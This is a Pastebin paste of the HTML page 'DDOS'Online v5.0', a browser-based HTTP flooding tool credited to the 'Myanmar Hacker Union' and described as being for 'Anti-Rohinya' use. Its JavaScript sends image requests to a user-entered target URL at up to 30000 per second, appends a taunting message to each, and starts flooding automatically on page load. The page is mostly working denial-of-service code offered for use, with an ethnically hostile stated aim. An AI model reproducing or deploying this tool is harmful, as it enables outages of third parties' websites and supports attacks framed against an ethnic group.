Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>DDOS'Online v5.0</title>
- <script charset="utf-8" id="injection_graph_func" src="dd0s_data/injection_graph_func.js"></script><script id="_nameHighlight_injection"></script><link class="skype_name_highlight_style"
- href="dd0s_data/injection_nh_graph.css" type="text/css" rel="stylesheet" charset="utf-8" id="_injection_graph_nh_css"><link rel="me" href="http://www.blogger.com/profile/11021578886371849930" />
- <link rel="openid.server" href="http://www.blogger.com/openid-server.g" />
- <!-- --><style type="text/css">@import url(https://www.blogger.com/static/v1/v-css/navbar/3334278262-classic.css);
- div.b-mobile {display:none;}
- </style>
- </head><body style="background-color: black; color: rgb(255, 255, 255);"><script type="text/javascript">
- function setAttributeOnload(object, attribute, val) {
- if(window.addEventListener) {
- window.addEventListener('load',
- function(){ object[attribute] = val; }, false);
- } else {
- window.attachEvent('onload', function(){ object[attribute] = val; });
- }
- }
- </script>
- <div id="navbar-iframe-container"></div>
- <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
- <script type="text/javascript">
- gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() {
- if (gapi.iframes && gapi.iframes.getContext) {
- gapi.iframes.getContext().openChild({
- url: 'https://www.blogger.com/navbar.g?targetBlogID\0751156928947605311360\46blogName\75DDos+online+attacking\46publishMode\75PUBLISH_MODE_BLOGSPOT\46navbarType\75BLUE\46layoutType\75CLASSIC\46searchRoot\75http://dreamcity-ddos.blogspot.com/search\46blogLocale\75en\46v\0752\46homepageUrl\75http://dreamcity-ddos.blogspot.com/\46vt\75-7626790724241017635',
- where: document.getElementById("navbar-iframe-container"),
- id: "navbar-iframe"
- });
- }
- });
- </script><center> </center>
- <p style="text-align: center; font-family: Arial; font-size: 20px;"><a href="WWW.dreamcity-dreamer.blogspot.com"><font color="red" size="5">Dream City</font></a><br>
- <script type="text/javascript" src="dd0s_data/on3.htm"></center></script>1 User Online
- </p><center><font color="gold" size="4">Myanmar</font> <font color="red" size="4">Hacker </font> <font color="gold" size="4">Union</font>
- </a></h1></center>
- <div style="position: absolute; width: 100%; height: 100%;">
- <div style="width: 490px; height: 326px; position: absolute;"><tr><td>
- <a>>
- <font color="gree"> This tool is using for</font><font color="red"> Anti-Rohinya</font> ..<br>
- <br>>
- <font color="blue">Office Web </font> : <a href="http://dreamcity-dreamer.blogspot.com"><font color="red">www.dreamcity-dreamer.blogspot.com</font></a>
- </a></tr></td></div>
- <div style="width: 240px; height: 100px; position: absolute; left: 500px;">
- <fieldset style="width: 100%; height: 100%;">
- <legend><a>Step 1. Select your target:</a></legend>
- <label><a>URL: <br> <input id="targetURL" style="width: 100%;" value="http://www.target.com"></a></label><a> <!-- disabled="true" -->
- <small>Eg : http://www.softpedia.com</small>
- </a></fieldset></div>
- <div style="width: 180px; height: 100px; position: absolute; left: 780px;">
- <fieldset style="width: 100%; height: 100%;">
- <legend><a>Step 2. Ready?</a></legend>
- <button id="fireButton" style="border-color: rgb(255, 255, 255); background-color: black; color: lime; width: 180px; height: 70px;">Start flooding</button>
- </fieldset>
- </div>
- <div style="width: 240px; height: 160px; position: absolute; left: 500px; top: 150px;">
- <fieldset style="width: 100%; height: 100%;">
- <legend><a>Optional. Options</a></legend>
- <label><a>Requests per second : <input style="width: 40px;" id="rps" value="30000"></a></label><a><br>
- <label>Append message : <br><input style="width: 100%;" id="message" value="We are Myanmar , We love our country , Now , Good bye baby!!!"></label>
- </a></fieldset>
- </div>
- <div style="width: 180px; height: 160px; position: absolute; left: 780px; top: 150px;">
- <fieldset style="width: 100%; height: 100%;">
- <a> </a><legend><a>Attack status:</a></legend>
- <dl>
- <dt><a>Requested:
- </a></dt><dd id="requestedCtr"><a>0
- </a></dd><dt style="opacity: 0.5; color: green;"><a>Request OK :
- </a></dt><dd style="opacity: 0.5;" id="succeededCtr"><a>0
- </a></dd><dt style="opacity: 0.5; color: red;"><a>Request failed :
- </a></dt><dd style="opacity: 0.5;" id="failedCtr"><a>0
- </a></dd></dl>
- </fieldset>
- </div>
- </div>
- <script>
- (function () {
- var fireInterval;
- var isFiring = false;
- var requestedCtrNode = document.getElementById("requestedCtr"),
- succeededCtrNode = document.getElementById("succeededCtr"),
- failedCtrNode = document.getElementById("failedCtr"),
- targetURLNode = document.getElementById("targetURL"),
- fireButton = document.getElementById("fireButton"),
- messageNode = document.getElementById("message"),
- rpsNode = document.getElementById("rps"),
- timeoutNode = document.getElementById("timeout");
- var targetURL = targetURLNode.value;
- targetURLNode.onchange = function () {
- targetURL = this.value;
- };
- var requestsHT = {}; // requests hash table, may come in handy later
- var requestedCtr = 0,
- succeededCtr = 0,
- failedCtr = 0;
- var makeHttpRequest = function () {
- if (requestedCtr > failedCtr + succeededCtr + 1000) { //Allow no more than 10000 hung requests
- return;
- };
- var rID =Number(new Date());
- var img = new Image();
- img.onerror = function () { onFail(rID); };
- img.onabort = function () { onFail(rID); };
- img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
- img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
- requestsHT[rID] = img;
- onRequest(rID);
- };
- var onRequest = function (rID) {
- requestedCtr++;
- requestedCtrNode.innerHTML = requestedCtr;
- };
- var onComplete = function (rID) {
- delete requestsHT[rID];
- };
- var onFail = function (rID) {
- // failedCtr++;
- //failedCtrNode.innerHTML = failedCtr;
- succeededCtr++; //Seems like the url will always fail if it isn't an image
- succeededCtrNode.innerHTML = succeededCtr;
- delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
- };
- var onSuccess = function (rID) {
- succeededCtr++;
- succeededCtrNode.innerHTML = succeededCtr;
- delete requestsHT[rID];
- };
- fireButton.onclick = function () {
- if (isFiring) {
- clearInterval(fireInterval);
- isFiring = false;
- this.innerHTML = "START";
- } else {
- isFiring = true;
- this.innerHTML = "Stop flooding";
- fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
- }
- };
- })();
- isFiring = true;
- document.getElementById("fireButton").innerHTML = "Start flooding";
- fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(document.getElementById("rps").value) | 0));
- </script>
- <div id="cboxdiv" style="border: 1px solid rgb(195, 215, 229); padding: 3px; background: rgb(237, 243, 247) none repeat scroll 0% 0%; display: none; position: fixed; bottom: 48px; right: 16px; width: 200px; -moz-background-clip:
- border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; line-height: 0pt;"></div>
- <script type="text/javascript">
- var cbvis = false;
- var cbload = false;
- var cbcookie = "cboxvis=";
- function togglecbox () {
- var cbdiv = document.getElementById("cboxdiv");
- var cbbut = document.getElementById("cboxbutton");
- if (!cbvis) {
- if (!cbload) {
- cbdiv.innerHTML = '<iframe frameborder="0" width="200" height="305" src="http://www5.cbox.ws/box/?boxid=722540&boxtag=62bvds&sec=main" marginheight="2" marginwidth="2"
- scrolling="auto" allowtransparency="yes" name="cboxmain5-722540" style="border:#000000 1px solid;border-bottom:0px" id="cboxmain5-722540"></iframe><iframe frameborder="0" width="200" height="75"
- src="http://www5.cbox.ws/box/?boxid=722540&boxtag=62bvds&sec=form" marginheight="2" marginwidth="2" scrolling="no" allowtransparency="yes" name="cboxform5-722540" style="border:#000000 1px
- solid;border-top:0px" id="cboxform5-722540"></iframe>';
- cbload = true;
- }
- cbdiv.style.display = "block";
- cbbut.innerHTML = <FONT COLOR="#000000">"Close Cbox"</FONT>;
- }
- else {
- cbdiv.style.display = "none";
- cbbut.innerHTML = "Open Cbox";
- }
- cbvis = !cbvis;
- document.cookie = cbcookie+((cbvis)?1:0);
- }
- </script>
- <noscript><a>JavaScript is required to view this page.</a></noscript><br><br><br>
- <em style="font-style: normal;"></em><embed src="http://www.avalonbraais.co.za/gaba.swf?file=http://ce.media.v4.skyrock.net/music/ce8/c1c/ce8c1cbd8bf9a2e4ec79da688c9959fd.mp3" autostart="true" hidden="true"
- align="left" width="10" height="10">
- <script type="text/javascript" src="https://www.blogger.com/static/v1/common/js/1912144495-csitail.js"></script>
- <script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body></html>
- <div style="position: absolute; width: 100%; height: 100%;"><a><div style="width: 490px; height: 326px; position: absolute;"><img alt="LOIC" src="http://xpertoffice.com/mmflag.gif"></div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement